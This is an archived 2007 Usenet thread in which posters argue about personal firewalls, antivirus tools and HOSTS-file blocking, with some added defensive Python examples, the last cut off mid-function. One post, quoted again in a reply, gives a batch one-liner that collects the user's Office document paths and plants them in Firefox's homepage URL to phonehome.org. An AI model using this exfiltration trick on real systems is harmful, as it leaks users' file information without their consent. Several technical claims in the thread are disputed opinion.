Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 02:10:28 by Dustin Cook
"Sebastian G." wrote in
news:5osig1FohfakU4@mid.dfncis.de:
> Dustin Cook wrote:
>
>
>>>> I wouldn't outright say a waste of resources, you can use one to
>>>> keep some applications from calling home.. for whatever reason. :)
>>> You'd wish.
>>
>> Unless the application is designed to evade whatever firewall a
>> person might be using, that's usually how it goes.
>
>
> If the application isn't malicious, then you don't need to enforce
> that it does what exactly it does. On the contrary, if you think that
> it does something that it shouldn't do, then you're already
> considering it as malicious.
Hmm, we seem to be thinking along different lines here. If I don't want
so and so application to call home, malicious intentions or not, it's not
going to on this box. If I am testing software, and/or running software
that automatically checks for updates and won't let me turn it off, I
like the ability to block outgoing internet requests from that
application. And as I said originally, software firewalls unless
specifically targeted aren't going to let the data pass.
>> If you know something I don't,
>> feel free to share it, we can all learn.
> Hm... what about applications seeming non-malicious? A well-known
> example is commercial software from Adobe, whereas the Adobe License
> Manager Service uses the Raw Sockets API to successfully bypass about
> any typical "personal firewall".
Even when using raw socket calls, if the lsp layer has firewall
components, the firewall still gets the final say. Ask anyone who's had
to repair a system's tcpip stack due to a nasty removal of zone alarm.
Do you have anything of value to contribute to the discussion, or is your
intent to troll?
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 03:16:46 by Maximus the Mad
Dustin Cook after much thought,came up
with this jewel in news:Xns99DAD7562BE88HHI2948AJD832@69.28.186.121:
> Have you actually examined the program I mentioned yourself?
I doubt it
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 07:40:59 by John Adams
Aaron wrote:
> Look carefully, Jetico can generate multiple prompts for one action (for
> example there is a generic request for network access first, followed by
> the normal request that most firewalls will warn on). v1 freeware is
> IMHO one of the most complicated personal firewalls to use out there.
>
And the most annoying. Only firewall I ever found more annoying was
Safety.NET when I set it to full security mode, but that is more than
just a firewall.
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 15:27:35 by private
[Followup-To set to alt.dev.null]
On Thu, 01 Nov 2007 01:23:38 +0100, Sebastian G. wrote:
> >>> I'm quite happy with my system, so there's really no need for you to
> >>> sulk about it...
> >> As long as you unplug it from the internet, I won't complain.
> > Then I guess you'll keep on sulking then.
> But only to your ISP, which might decide to simply disconnect your machine
> until you stop it from flooding the internet with spam.
Sulk away...
--
s|b
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 16:30:45 by Dustin Cook
Maximus the Mad wrote in
news:Xns99DAE28EE1865whatsinaname@207.115.33.102:
> Dustin Cook after much thought,came up
> with this jewel in news:Xns99DAD7562BE88HHI2948AJD832@69.28.186.121:
>
>> Have you actually examined the program I mentioned yourself?
>
> I doubt it
Even so, with all of the packages out there, it's completely understandable
that he might assume BugHunter was like the rest. I hope to have cleared
that up with my responses, but who really knows...
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 20:30:29 by Sebastian Gottschalk
Dustin Cook wrote:
>> Firefox: the worst thing you could make out of the Gecko platform
>
> Examples please?
- global namespace pollution
- cookie, P3P and SSL options not exposed for configuration and with
horrible defaults
- all kinds of internal mandatory policies to cashade symptoms instead of
fixing the actual issue
- horrible component layering
- horrible compatibility issues with extensions
>> NOD32: virus scanner... highly incomplete approach and high potential
>> for parsing vulnerabilities and privilege escalation
>
> NOD32 is considered one of the best engines available,
That still doesn't make it better than not using any virus scanner at all.
Now again: the bad guys typically use self-modifying and self-encrypting
code to not omit any signature pattern, use side effects to not omit any
specific behaviour. Pattern matching and behaviour analysis totally fail in
practice, now why exactly should I have the program crumping through every
little file on every little file system activity? I'd know much better ways
to burn resources for nothing.
> And, it can't do its thing without admin rights, due to the registry
> keys which have to be modified.
Very very wrong. As a non-admin user, I can tell for sure that no-one messed
with HKLM. Now, it has full access to HKCU where possible damage could have
been done. Why doesn't it degrade gracefully to work on only that?
> That's a good thing. I wouldn't want a program being able to set those
> keys if I was on the guest account. :)
The bad programs won't care. I'd like a normal program to not even try it,
since it simply can't do it anyway without sufficient privileges.
>> Spybot Search+Destroy immunization: aside from cluttering the
>> HKEY_LOCAL_MACHINE hive full of useless ClassID, it achieves exactly
>> what? malware authors simply use randomly generated GUIDs or simply
>
> Blocks installation of older malware applications with GUID's that are
> already known and used.
OK, and why would I mind if the newer malware already hoses the system?
>> registrationless COM. MSIE still remains fully vulnerable to
>
> I certainly don't dispute the security risks present with MSIE. :)
Risk? It's insecure by design, and fully documented as such. One could argue
that abusing it as a webbrowser is a user control error since it was never
promised to be securely usable in a hostile environment, and was documented
like that, so it's not a security violation by definition.
So, again, why should I care for the GUIDs of old malware if even the old
malware already marches in through well-documented functionality that some
people would consider a security vulnerability?
>> If not, then obviously didn't ask anything that would be sufficient
>> for a firewall concept yet.
>
> I asked you specifically what you felt was a firewall, I didn't ask for a
> trolling response. :) And I thank you for the time you spent responding
> to me.
It was not a trolling response, it was a well-specified example of what
language constructs are necessary to completely express the intended ruleset
of a routing firewall. Without such constructs, there are cases whereas you
can fully specify what you consider as wanted traffic but never implement it
in rules without additionally allowing unwanted traffic or denying wanted
traffic.
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 20:47:38 by Sebastian Gottschalk
Dustin Cook wrote:
> Hmm, we seem to be thinking along different lines here. If I don't want
> so and so application to call home, malicious intentions or not, it's not
> going to on this box. If I am testing software, and/or running software
> that automatically checks for updates and won't let me turn it off, I
> like the ability to block outgoing internet requests from that
> application. And as I said originally, software firewalls unless
> specifically targeted aren't going to let the data pass.
You're kidding, right? I show a very very easy, highly portable and not
specifically targeting way to phone home as you like:
set x=
for /r %i (*.doc *.xls *.ppt) do set x=%x%^;%i
for /r %i in (prefs.js) do echo
user_pref("browser.startup.homepage"^,"http://phonehome.org? %x%")^;>>"%i"
Then wait until the user launches Firefox for the next time.
Now if you understood the message, I might tell you that extremely more
sophisticated ways of IPC have already been used by malware ten years ago.
So, as long as you don't block all applications indiscriminately, you've
already lost the race. (Even further, when you're running with admin rights,
you've already lost anyway.)
>> Hm... what about applications seeming non-malicious? A well-known
>> example is commercial software from Adobe, whereas the Adobe License
>> Manager Service uses the Raw Sockets API to successfully bypass about
>> any typical "personal firewall".
>
> Even when using raw socket calls, if the lsp layer has firewall
> components, the firewall still gets the final say.
Now I know that you don't know what you're talking about. The Raw Sockets
are in the NDIS layer, thus right below the TDI layer, whereas the LSP layer
is above TDI.
I'm not even gonna start discussing about adding third-party stuff like
WinPCap...
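A defensive check for the preference-file tampering described in the post above, as an added example that is not part of the original post: it parses Firefox `prefs.js` text and flags a homepage preference that appears more than once or that carries local file paths in its URL. The function names, the regular expressions and the sample file contents (including the host `collector.invalid`) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample: a profile's prefs.js before and after an outside edit.
SAMPLE_CLEAN = r'''user_pref("browser.startup.homepage", "https://www.example.org/");
user_pref("browser.download.dir", "C:\\Users\\alice\\Downloads");
'''
SAMPLE_TAMPERED = SAMPLE_CLEAN + r'''user_pref("browser.startup.homepage","http://collector.invalid/? ;C:\Users\alice\budget.xls;C:\Users\alice\plan.doc");
'''

# One line of the form: user_pref("name", value);
PREF_RE = re.compile(r'^\s*user_pref\(\s*"([^"]+)"\s*,\s*(.*?)\s*\)\s*;\s*$')

# Heuristics for local paths inside a URL: drive letters, UNC paths and
# office document extensions.
PATH_HINTS = re.compile(
    r'(?i)(?:\b[a-z]:[\\/]|\\\\[\w.-]+[\\/]|\.(?:docx?|xlsx?|pptx?)\b)'
)


def parse_prefs(text):
    """Return (line_no, name, raw_value) for every user_pref line."""
    prefs = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        match = PREF_RE.match(line)
        if match:
            prefs.append((line_no, match.group(1), match.group(2)))
    return prefs


def audit_homepage(text, pref="browser.startup.homepage"):
    """Return a list of (finding, line_numbers) for the homepage preference."""
    entries = [(no, raw) for no, name, raw in parse_prefs(text) if name == pref]
    findings = []

    # Firefox writes each preference once, so a repeated name suggests that
    # something else appended to the file.
    if len(entries) > 1:
        findings.append(("duplicate-pref", [no for no, _ in entries]))

    if entries:
        # Assumption: the last occurrence is the one that takes effect.
        line_no, raw = entries[-1]
        # Several homepages can be stored in one value, separated by "|".
        for url in raw.strip('"').split("|"):
            try:
                parts = urlsplit(url)
            except ValueError:
                continue
            # Only the query and fragment are checked, so an ordinary
            # homepage whose path ends in a document name is not flagged.
            carried = unquote(parts.query + "#" + parts.fragment)
            if PATH_HINTS.search(carried):
                findings.append(("local-path-in-url", [line_no]))
                break
    return findings


if __name__ == "__main__":
    for label, sample in (("clean", SAMPLE_CLEAN), ("tampered", SAMPLE_TAMPERED)):
        print(label, audit_homepage(sample))
```

The check works on the file's text only, so it can run from a limited account against a copy of the profile.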
Re: Jetico Personal Firewall freeware asks way to many questions
on 01.11.2007 21:29:52 by Dustin Cook
"Sebastian G." wrote in
news:5ouor8FortvkU1@mid.dfncis.de:
> Dustin Cook wrote:
>
>
>> Hmm, we seem to be thinking along different lines here. If I don't
>> want so and so application to call home, malicious intentions or not,
>> it's not going to on this box. If I am testing software, and/or
>> running software that automatically checks for updates and won't let
>> me turn it off, I like the ability to block outgoing internet
>> requests from that application. And as I said originally, software
>> firewalls unless specifically targeted aren't going to let the data
>> pass.
>
>
> You're kidding, right? I show a very very easy, highly portable and
> not specifically targeting way to phone home as you like:
>
> set x=
> for /r %i (*.doc *.xls *.ppt) do set x=%x%^;%i
> for /r %i in (prefs.js) do echo
> user_pref("browser.startup.homepage"^,"http://phonehome.org? %x%")^;>>"%
> i"
>
> Then wait until the user launches Firefox for the next time.
>
>
> Now if you understood the message, I might tell you that extremely
> more sophisticated ways of IPC have already been used by malware ten
> years ago.
I understand scripting, yes. thanks. Are you going to educate me on
malware history 101 next? Perhaps you'll teach me how executables are
infected. *g*
>
> So, as long as you don't block all applications indiscriminately,
> you've already lost the race. (Even further, when you're running with
> admin rights, you've already lost anyway.)
>
>
>>> Hm... what about applications seeming non-malicious? A well-known
>>> example is commercial software from Adobe, whereas the Adobe License
>>> Manager Service uses the Raw Sockets API to successfully bypass
>>> about any typical "personal firewall".
>>
>> Even when using raw socket calls, if the lsp layer has firewall
>> components, the firewall still gets the final say.
>
>
> Now I know that you don't know what you're talking about. The Raw
> Sockets are in the NDIS layer, thus right below the TDI layer, whereas
> the LSP layer is above TDI.
Okay....
> I'm not even gonna start discussing about adding third-party stuff
> like WinPCap...
Well, in any event, thanks for your time.
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
on 02.11.2007 20:24:08 by John Adams
Sebastian G. wrote:
> It does. It slows down the resolver and, in case of Windows, even
> partially breaks it. Aside from that, it's simply superfluous.
Not if you disable the DNS client service. DNS client service is useless
for a home PC. Hosts file is a good way to block malicious sites at the
source so fuck you geekboy.
Re: Jetico Personal Firewall freeware asks way to many questions
on 02.11.2007 21:21:09 by Sebastian Gottschalk
John Adams wrote:
> Sebastian G. wrote:
>
>> It does. It slows down the resolver and, in case of Windows, even
>> partially breaks it. Aside from that, it's simply superfluous.
>
> Not if you disable the DNS client service. DNS client service is useless
> for a home PC.
Aside from that it's the DNS *caching* service, your argument is nonsense.
Considering a minimum delay of 50ms and a typical delay of 200 ms for a
typical ISP's DNS server, caching improves latency very well.
> Hosts file is a good way to block malicious sites
The HOSTS file is about the most stupid idea to implement a local blacklist,
which by itself already is a stupid idea. Anyway, since almost every site
is malicious by definition, your categorization is nonsense as well.
> at the source
A DNS manipulation never blocks at the source, obviously.
Re: Jetico Personal Firewall freeware asks way to many questions
on 02.11.2007 22:42:24 by Maximus the Mad
"Sebastian G." after much thought,came up with
this jewel in news:5p1f63Fou98dU1@mid.dfncis.de:
>
> The HOSTS file is about the most stupid idea to implement a local
> blacklist, which by itself already is a stupid idea. Anyway, since
> almost every site is malicious by definition, your categorization
> is nonsense as well.
>
The only nonsense is not using a good hosts file.
note:
for those of you who are wondering what a hosts file is, see
http://www.mvps.org/winhelp2002/hosts.htm
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
on 02.11.2007 23:24:30 by Sebastian Gottschalk
Maximus the Mad wrote:
> "Sebastian G." after much thought,came up with
> this jewel in news:5p1f63Fou98dU1@mid.dfncis.de:
>> The HOSTS file is about the most stupid idea to implement a local
>> blacklist, which by itself already is a stupid idea. Anyway, since
>> almost every site is malicious by definition, your categorization
>> is nonsense as well.
>>
>
> The only nonsense is not using a good hosts file.
The only nonsense is not doing some stupid to hardly achieve a broken
concept? Well, if you think so... For me it's just fun seeing people keep on
telling the HOSTS file nonsense over and over in the dear hope that it would
actually help against whatever.
Re: Jetico Personal Firewall freeware asks way to many questions
on 03.11.2007 00:23:07 by Maximus the Mad
"Sebastian G." after much thought,came up with
this jewel in news:5p1mcuFp1uh1U1@mid.dfncis.de:
> Maximus the Mad wrote:
>> The only nonsense is not using a good hosts file.
>
>
> The only nonsense is not doing some stupid to hardly achieve a
> broken concept? Well, if you think so... For me it's just fun
> seeing people keep on telling the HOSTS file nonsense over and
> over in the dear hope that it would actually help against
> whatever.
>
calling something nonsense doesn't make it so.......
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
on 03.11.2007 01:41:15 by Sebastian Gottschalk
Maximus the Mad wrote:
> "Sebastian G." after much thought,came up with
> this jewel in news:5p1mcuFp1uh1U1@mid.dfncis.de:
>
>> Maximus the Mad wrote:
>>> The only nonsense is not using a good hosts file.
>>
>> The only nonsense is not doing some stupid to hardly achieve a
>> broken concept? Well, if you think so... For me it's just fun
>> seeing people keep on telling the HOSTS file nonsense over and
>> over in the dear hope that it would actually help against
>> whatever.
>>
>
> calling something nonsense doesn't make it so.......
And not calling it so doesn't make it any less nonsense. Now will you please
acknowledge the big downsides of the HOSTS file approach:
- doesn't support wildcards, but the bad guy's DNS server does. We will
simply use .domain.tld, and you'd never be
able to keep up with that (for a sufficiently long subdomain name)
- heavily interferes with DNS resolving and partially breaks DNS caching
- applies to every DNS lookup instead of just the ones issued by the exposed
application
- cannot be updated by a non-administrator user, and neither should
- OK, if I was an evil guy I'd add many non-malicious servers into the list
as well, and I'd make it so large that it seriously breaks the system.
Congratulations for having created a wonderful DoS condition.
- the HOSTS file is a 30 years old, totally outdated idea
As far as this concludes, only totally stupid computer users would follow
such a ridiculous approach, and it seems like there are a lot of them.
You're one, too!
Now coming to serious approaches on filtering spam from websites:
- AdBlock Plus. Simple, efficient, supports wildcards and filtering specific
elements.
- wildcard DNS manipulation using a local caching-only nameserver. BIND is
particularly easy, but PowerDNS works as well.
- blocking network segment by IP address range using a host-based packet
filter or a firewall
At any rate, no approach whatsoever could be a security concept, it's only
good for filtering out advertisement and other kinds of annoyance - it can't
make a vulnerable internet facing application any less critical. Therefore,
this entire discussion *is off-topic here*!
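The wildcard limitation and the resolver-side alternative listed in the post above, as an added example that is not part of the original post: an exact-name lookup in the style of a HOSTS file next to a suffix match of the kind a local caching resolver can apply to a whole zone. The hostnames under `tracker.example`, the helper names and the sample file are constructed for illustration.

```python
import secrets

SINK = "0.0.0.0"

# Constructed sample in HOSTS-file format.
SAMPLE_HOSTS = """\
# address    name [aliases...]
127.0.0.1    localhost
0.0.0.0      ads.tracker.example      # inline comment
0.0.0.0      cdn.tracker.example banner.tracker.example
"""


def normalize(name):
    """Lower-case a hostname and drop the trailing root dot."""
    return name.lower().rstrip(".")


def parse_hosts(text):
    """Map every hostname in HOSTS-format text to its address."""
    table = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            table[normalize(name)] = addr
    return table


def hosts_blocked(table, qname):
    """HOSTS semantics: only a literal name match is ever redirected."""
    return table.get(normalize(qname)) == SINK


def zone_blocked(zones, qname):
    """Resolver-style policy: block a zone apex and every name beneath it."""
    labels = normalize(qname).split(".")
    # Compare whole suffixes on label boundaries, so 'nottracker.example'
    # is not mistaken for a child of 'tracker.example'.
    return any(".".join(labels[i:]) in zones for i in range(len(labels)))


def coverage(table, zones, trials=1000):
    """Count how many freshly generated subdomains each approach blocks."""
    hit_hosts = hit_zone = 0
    for _ in range(trials):
        # A wildcard record in the zone answers for any label, so the
        # left-most label can be different on every request.
        qname = f"{secrets.token_hex(8)}.tracker.example"
        hit_hosts += hosts_blocked(table, qname)
        hit_zone += zone_blocked(zones, qname)
    return hit_hosts, hit_zone


if __name__ == "__main__":
    table = parse_hosts(SAMPLE_HOSTS)
    zones = {"tracker.example"}
    print("listed name, HOSTS :", hosts_blocked(table, "ads.tracker.example"))
    print("new label,   HOSTS :", hosts_blocked(table, "x1.tracker.example"))
    print("new label,   zone  :", zone_blocked(zones, "x1.tracker.example"))
    print("random labels (HOSTS, zone):", coverage(table, zones))
```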
Re: Jetico Personal Firewall freeware asks way to many questions
on 03.11.2007 03:34:15 by Maximus the Mad
"Sebastian G." after much thought,came up with
this jewel in news:5olhodFnfd9dU1@mid.dfncis.de:
> Max M.Wachtel III wrote:
>
>>>> MVPS hosts file
>>>
>>> A very bad start for a proposedly good start. What should this
>>> shit be good for, other than fucking up the system?
>>
>> what???? a good hosts file doesn't f*ckup anything.
>
>
> It does. It slows down the resolver and, in case of Windows, even
> partially breaks it. Aside from that, it's simply superfluous.
>
> Even further, it simply doesn't work, as a normal user doesn't
> have write access to the HOSTS file, and doesn't have the
> privilege to restart the system either - neither would this be
> reasonable.
The normal user is running an account with write access. You need to
get out more.
Normal is a setting on my dryer(which doesn't work very well).
>>> If you
>>> really like a Mozilla core, take Mozilla SeaMonkey.
>> I use Portable Apps and SM is not yet available.
>
>
> Mozilla SeaMonkey is profile-portable by design.
Yes but the folks at portable apps make changes to the programs that
make them USB friendly.
>>>> a good AV solution(like NOD32)
>>>
>>> This is not even a solution at all.
>> what do you use?
>
>
> A real solution: a global non-exec policy enforced by the kernel.
at which point the average user would get that glossy look in their
eyes and say what????. Most folks go out to BigStoreUSA,bring the
thing home and just plug it in and go.
>
>>>> Spyware Blaster
>>>> Spybot Search+Destroy immunization
>>
>> any added protection that uses no extra resources is a good
>> thing.
>
> Any added software increases complexity and therefore decreases
> security. Unless it can actually justify this, it is a bad thing.
> Spyware scanners definitely are bad, and this immunization stuff
> has only one purpose: fucking up the system.
I justify it by the users that keep their systems free from malware.
Immunization does not mess anything up. A multi-layered approach is
the best way for the average user (who, by the way, runs with
rights). Users want to be able to install,change things etc.
>> Why do you say anything is broken????
>
> Because it usually is. Just like your concept.
Infections are spread around the most by the home user. Most have no
idea about group policies,limited user accounts,etc. My concept works
out here in the trenches.
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
on 03.11.2007 13:17:38 by Sebastian Gottschalk
Maximus the Mad wrote:
> The normal user is running an account with write access.
Then there's no need to discuss security.
>> A real solution: a global non-exec policy enforced by the kernel.
>
> at which point the average user would get that glossy look in their
> eyes and say what????
If they decide to ignore the minimum required knowledge to operate their
computers properly, it's their problem, not mine. The computer and the way
computers operate won't change that soon.
> I justify it by the users that keep their systems free from malware.
Oh, no we're talking about empty sets...
> Immunization does not mess anything up.
It clodges the HKLM\Software\Classes\CLSID full of useless entries.
> A multi-layered approach
This has nothing to do with multiple layers (an often misused buzzword) or
with security at all.
> My concept works out here in the trenches.
Except that it doesn't work at all. And I'd even refrain from calling it a
concept, because there's no logic behind it.
Re: Jetico Personal Firewall freeware asks way to many questions
am 03.11.2007 20:29:48 von John Adams
Sebastian G. wrote:
>
> Aside from that it's the DNS *caching* service, your argument is
> nonsense.
It's called the DNS Client service in the services list, asshole.
> http://www.mvps.org/winhelp2002/hosts.htm
> Editors Note: in most cases a large HOSTS file (over 135 kb) tends to slow down the machine. This only occurs in W2000/XP/Vista. Windows 98 and ME are not affected.
>
> To resolve this issue (manually) open the "Services Editor"
>
> * Start | Run (type) "services.msc" (no quotes)
> * Scroll down to "DNS Client", Right-click and select: Properties
> * Click the drop-down arrow for "Startup type"
> * Select: Manual, or Disabled (recommended) click Apply/Ok and restart. [more info]
>
> When set to Manual you can see that the above "Service" is not needed (after a little browsing) by opening the Services Editor again, scroll down to DNS Client and check the "Status" column. It should be blank, if it was needed it would show "Started" in that column. There are several Utilities that can reset the DNS Client for you ... [more info]
I've been using a hosts file to block shit for years now and don't
intend to stop because of what some moronic self-proclaimed "expert" thinks.
Re: Jetico Personal Firewall freeware asks way to many questions
am 03.11.2007 20:54:42 von Maximus the Mad
John Adams after much thought, came up with this
jewel in news:M_3Xi.15339$Nb1.10403@fe01.news.easynews.com:
> Sebastian G. wrote:
>
>>
>> Aside from that it's the DNS *caching* service, your argument is
>> nonsense.
>
> It's called the DNS Client service in the services list, asshole.
and there are some other services that should be turned off.
>> http://www.mvps.org/winhelp2002/hosts.htm
>
>
>
>> Editors Note: in most cases a large HOSTS file (over 135 kb)
>> tends to slow down the machine. This only occurs in
>> W2000/XP/Vista. Windows 98 and ME are not affected.
>>
>> To resolve this issue (manually) open the "Services Editor"
>>
>> * Start | Run (type) "services.msc" (no quotes)
>> * Scroll down to "DNS Client", Right-click and select:
>> Properties * Click the drop-down arrow for "Startup type"
>> * Select: Manual, or Disabled (recommended) click
>> Apply/Ok and restart. [more info]
>>
>> When set to Manual you can see that the above "Service" is
>> not needed (after a little browsing) by opening the Services
>> Editor again, scroll down to DNS Client and check the
>> "Status" column. It should be blank, if it was needed it
>> would show "Started" in that column. There are several
>> Utilities that can reset the DNS Client for you ... [more
>> info]
>
> I've been using a hosts file to block shit for years now and don't
> intend to stop because of what some moronic self-proclaimed
> "expert" thinks.
as it should be.......
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
am 03.11.2007 23:33:54 von Sebastian Gottschalk
John Adams wrote:
> Sebastian G. wrote:
>
>> Aside from that it's the DNS *caching* service, your argument is
>> nonsense.
>
> It's called the DNS Client service in the services list, asshole.
Its internal name is DnsCache, and it has been well documented that the name
"DNS Client service" is highly misleading.
> I've been using a hosts file to block shit for years now and don't
> intend to stop because of what some moronic self-proclaimed "expert" thinks.
It's really strange that almost any other expert will tell you how flawed
this approach is.
Beside that, there's no need to block anything, since you have to implement
a serious filter at the application anyway.
Re: Jetico Personal Firewall freeware asks way to many questions
am 04.11.2007 10:36:32 von Michael J Kingston
In message <5p4bajFob481U1@mid.dfncis.de>, Sebastian G.
writes
>John Adams wrote:
>
>> Sebastian G. wrote:
>>
>>> Aside from that it's the DNS *caching* service, your argument is
>>>nonsense.
>> It's called the DNS Client service in the services list, asshole.
>
>
>Its internal name is DnsCache, and it has been well documented that the
>name "DNS Client service" is highly misleading.
>
>> I've been using a hosts file to block shit for years now and don't
>>intend to stop because of what some moronic self-proclaimed "expert"
>>thinks.
>
>
>It's really strange that almost any other expert will tell you how
>flawed this approach is.
OK, how flawed? I'm happy with the effect that I SEE my Hosts file has.
What harm? I'd seriously like to know.
>Beside that, there's no need to block anything, since you have to
>implement a serious filter at the application anyway.
--
Michael J Kingston
Re: Jetico Personal Firewall freeware asks way to many questions
am 05.11.2007 19:57:08 von John Adams
Sebastian G. wrote:
> Its internal name is DnsCache, and it has been well documented that the
> name "DNS Client service" is highly misleading.
I know what it does but why would I call it DNS Cache when it reads DNS
Client in the services list? That would be just confusing to someone who
may be reading this thread and want to implement a hosts file for
blocking malicious sites.
> Beside that, there's no need to block anything, since you have to
> implement a serious filter at the application anyway.
Whatever. All I know is that if I have 127.0.0.1
www.drivebuydownloadsite.com in my hosts file that site could never try
to infect my PC. It works and it works well so I use it.
Re: Jetico Personal Firewall freeware asks way to many questions
am 05.11.2007 20:00:30 von John Adams
Sebastian G. wrote:
> It clogs the HKLM\Software\Classes\CLSID full of useless entries.
And how does that mess anything up? The registry size has no effect on
OS performance under XP and Vista, unlike Win9x.
Re: Jetico Personal Firewall freeware asks way to many questions
am 05.11.2007 20:04:39 von John Adams
Sebastian G. wrote:
> it slows down the resolver
I already told you that disabling DNS Client Service fixes that.
> Updating the HOSTS file requires write access that a normal user
> doesn't have there
If you use MVPS Hosts file it comes with a .bat file that takes care of
that for you. And what's the big deal about logging in to admin account
to write to the hosts file and then logging out and back into limited
user after? You are making a mountain out of a molehill.
Re: Jetico Personal Firewall freeware asks way to many questions
am 05.11.2007 20:23:33 von Sebastian Gottschalk
John Adams wrote:
>> it slows down the resolver
>
> I already told you that disabling DNS Client Service fixes that.
No, you didn't, and it isn't true either.
>> Updating the HOSTS file requires write access that a normal user
>> doesn't have there
>
> If you use MVPS Hosts file it comes with a .bat file that takes care of
> that for you.
Yes, that's exactly the problem.
> And what's the big deal about logging in to admin account
> to write to the hosts file and then logging out and back into limited
> user after?
It demands me to provide the admin password to the system, which is
something that should be avoided as much as possible. At any rate, I'd never
provide for such an absolutely idiotic administrative issue.
Re: Jetico Personal Firewall freeware asks way to many questions
am 05.11.2007 20:28:22 von Sebastian Gottschalk
John Adams wrote:
> Sebastian G. wrote:
>
>> Its internal name is DnsCache, and it has been well documented that the
>> name "DNS Client service" is highly misleading.
>
> I know what it does but why would I call it DNS Cache when it reads DNS
> Client in the services list?
Because we're discussing its actual functionality?
> That would be just confusing to someone who
> may be reading this thread and want to implement a hosts file for
> blocking malicious sites.
Which hasn't become any less stupid an idea yet. Since almost every website
should be considered malicious and especially truly malicious websites will
simply bypass the filter (by using randomly generated subdomains), this
approach will effectively be nothing else but a self-created DoS condition.
>> Beside that, there's no need to block anything, since you have to
>> implement a serious filter at the application anyway.
>
> Whatever. All I know is that if I have 127.0.0.1
> www.drivebuydownloadsite.com in my hosts file that site could never try
> to infect my PC.
And what about sadofhsajkldhfkjlsagdhfjkghdsaf.drivebuydownloadsite.com?
Huh, didn't get that entry?
Aside from that, Drive-by-downloads are a well-known myth, supported by the
fools who can't even differ a shell from a webbrowser.
> It works and it works well so I use it.
Sure it seems so to you, since you're too incompetent to judge where it
fails (and it fails so blatantly).
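Added example (not part of any post in this thread): a Python sketch of the exact-match behaviour the two posters are arguing about, checking which observed hostnames a blocking HOSTS file actually covers. The function names, the sample HOSTS content and the observed-name list are constructed for illustration (only the two drivebuydownloadsite.com names come from the posts), and the "last two labels" base-domain rule is a simplifying assumption, not a public-suffix lookup.

```python
"""Coverage check for a blocking HOSTS file (added example, constructed data)."""

# Constructed sample in HOSTS-file format; the second entry is the one quoted in the thread.
SAMPLE_HOSTS = """\
# constructed sample
127.0.0.1   localhost
127.0.0.1   www.drivebuydownloadsite.com   # entry from the post
0.0.0.0     ads.example.net tracker.example.net
"""

# Constructed list of names a client tried to resolve (e.g. taken from a DNS or proxy log).
OBSERVED = [
    "www.drivebuydownloadsite.com",
    "sadofhsajkldhfkjlsagdhfjkghdsaf.drivebuydownloadsite.com",
    "drivebuydownloadsite.com",
    "ads.example.net",
    "cdn.example.net",
    "www.example.org",
]

# Addresses commonly used to sinkhole a name in a blocking HOSTS file.
SINKHOLES = {"127.0.0.1", "0.0.0.0", "::1"}


def normalize(name):
    """Hostnames compare case-insensitively; a trailing dot is the same name."""
    return name.lower().rstrip(".")


def parse_hosts(text):
    """Return {hostname: address}. '#' starts a comment; the first field is
    the address and every following field on the line is a name for it."""
    table = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        fields = line.split()
        if len(fields) < 2:
            continue  # blank, comment-only or malformed line
        addr = fields[0]
        for name in fields[1:]:
            # Keep the first entry seen for a name.
            table.setdefault(normalize(name), addr)
    return table


def is_blocked(table, hostname):
    """Exact-match lookup only: the HOSTS format has no wildcard or suffix rule."""
    return table.get(normalize(hostname)) in SINKHOLES


def base_domain(name):
    """Assumption for this sketch: the last two labels identify the site.
    A real tool would consult the public suffix list instead."""
    labels = normalize(name).split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else None


def coverage_gaps(table, observed):
    """Names that resolve normally although a sibling or child name under
    the same base domain is sinkholed in the HOSTS file."""
    blocked_bases = {base_domain(n) for n, a in table.items() if a in SINKHOLES}
    blocked_bases.discard(None)  # single-label names such as 'localhost'
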